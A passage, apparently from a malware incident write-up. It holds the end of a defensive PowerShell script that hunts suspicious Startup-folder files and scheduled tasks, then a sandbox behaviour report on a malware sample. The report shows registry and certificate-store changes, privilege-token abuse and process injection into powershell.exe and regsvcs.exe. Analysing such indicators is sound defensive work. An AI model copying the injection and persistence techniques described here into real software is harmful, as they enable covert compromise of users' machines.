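    $dirs += Get-ChildItem 'C:\Users' -Directory -ErrorAction SilentlyContinue |
             ForEach-Object { Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' }

    foreach ($dir in $dirs) {
        if (-not (Test-Path $dir)) { continue }
        foreach ($f in Get-ChildItem $dir -File -Force | Where-Object { $_.Name -ne 'desktop.ini' }) {
            $detail = ''
            if ($ScriptExt -contains $f.Extension) {
                # The first lines of a dropper .bat normally name the binary it starts
                $detail = (Get-Content $f.FullName -TotalCount 3 -ErrorAction SilentlyContinue) -join ' | '
            }
            $flag = if ($ScriptExt -contains $f.Extension -or $f.Extension -eq '.exe') { 'review' } else { '' }
            [pscustomobject]@{
                Kind    = 'StartupFile'
                Name    = $f.FullName
                Created = $f.CreationTime
                Detail  = $detail
                Flag    = $flag
            }
        }
    }
}

function Get-SuspiciousScheduledTasks {
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($a in $task.Actions) {
            # Only Exec actions carry a command; COM-handler actions have no Execute
            if (-not $a.Execute) { continue }
            $cmd = "$($a.Execute) $($a.Arguments)".Trim()
            if ($cmd -match $UserWritable) {
                [pscustomobject]@{
                    Kind    = 'ScheduledTask'
                    Name    = "$($task.TaskPath)$($task.TaskName)"
                    Created = $task.Date
                    Detail  = $cmd
                    Flag    = 'review'
                }
            }
        }
    }
}

@(Get-StartupItems) + @(Get-SuspiciousScheduledTasks) | Format-Table -AutoSize -Wrap
```

A clean Startup folder holds only desktop.ini, so anything the first function lists deserves a look; creation time and owner tell you whether it arrived with the infection. Because the report does not preserve the schtasks.exe arguments, the task names cannot be given here; on hosts where "Audit Other Object Access Events" is enabled, Security Event ID 4698 records the full task XML at creation time and closes that gap.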

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
N/A N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2208 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2208 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2208 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2324 wrote to memory of 400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe
PID 2324 wrote to memory of 400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe
